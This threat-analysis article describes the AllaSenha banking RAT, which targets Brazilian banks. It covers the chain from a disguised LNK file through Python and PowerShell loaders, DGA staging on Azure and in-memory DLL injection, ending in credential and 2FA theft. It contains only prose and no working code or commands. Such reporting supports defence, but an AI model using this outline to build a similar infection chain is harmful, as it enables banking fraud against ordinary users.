AllaSenha Mobile Malware

Brazilian banks are facing a fresh onslaught as a new campaign introduces a Remote Access Trojan (RAT) dubbed AllaSenha. This malware is tailored to pilfer the credentials crucial for Brazilian bank account access, utilizing Azure cloud as its Command-and-Control (C2) infrastructure. Analysts scrutinizing this menace have affirmed its resemblance to a customized iteration of the Windows-based AllaKore mobile malware.

Notable banking institutions targeted in this revealed offensive encompass Banco do Brasil, Bradesco, Banco Safra, Caixa Econômica Federal, Itaú Unibanco, Sicoob and Sicredi. While the precise initial access method remains unconfirmed, indications suggest the utilization of threatening links within phishing communications.

The Initial Stage of the Attack Chain Delivering AllaSenha RAT

The attack commences with a deceptive Windows shortcut (LNK) file posing as a PDF document ('NotaFiscal.pdf.lnk'), hosted on a WebDAV server since at least March 2024. Moreover, there are indications that the threat actors behind this operation have previously exploited legitimate services such as Autodesk A360 Drive and GitHub to host their payloads.

Upon execution, the LNK file triggers a Windows command shell, which displays a fake PDF file to the recipient while also fetching a BAT payload named 'c.cmd' from the same WebDAV server location.

Known as the BPyCode launcher, this file initiates a Base64-encoded PowerShell command, which in turn downloads the Python binary from the official www.python.org site to execute a Python script named BPyCode.

Additional Harmful Tools Deployed as Part of the Attack

BPyCode serves as a downloader for a dynamic-link library ('executor.dll') and executes it in memory. The DLL is obtained from one of the domain names generated via a domain generation algorithm (DGA).

The generated hostnames appear to align with those linked to the Microsoft Azure Functions service, a serverless infrastructure that, in this context, enables operators to conveniently deploy and rotate their staging infrastructure. In detail, BPyCode retrieves a pickle file containing three items: a secondary Python loader script, a ZIP archive containing the PythonMemoryModule package and another ZIP archive containing 'executor.dll.'

Subsequently, the new Python loader script is activated to load 'executor.dll,' a Borland Delphi-based malware, also known as ExecutorLoader, into memory using PythonMemoryModule. ExecutorLoader's primary function involves decoding and executing AllaSenha by injecting it into a legitimate mshta.exe process.

The AllaSenha RAT Harvests Victims’ Banking Credentials

Aside from harvesting online banking credentials stored in Web browsers, AllaSenha possesses the capability to present overlay windows, enabling the capture of two-factor authentication (2FA) codes and even coercing victims into scanning a QR code to authorize a fraudulent transaction initiated by the attackers.

AllaSenha operates under the original file name Access_PC_Client_dll.dll, a designation notably associated with the KL Gorki project. This banking malware appears to amalgamate elements from both AllaKore and a threat known as ServerSocket.

Deeper scrutiny of the source code linked to the initial LNK file and AllaSenha suggests the involvement of a Portuguese-speaking individual named bert1m in the malware's development. However, there is currently no evidence indicating their direct operation of the tools.

Researchers highlight that cybercriminals operating in Latin America demonstrate noteworthy productivity in launching cybercrime campaigns. While their primary focus lies in targeting Latin American individuals to steal banking information, these actors frequently compromise computers operated by subsidiaries or employees worldwide, particularly in Brazil.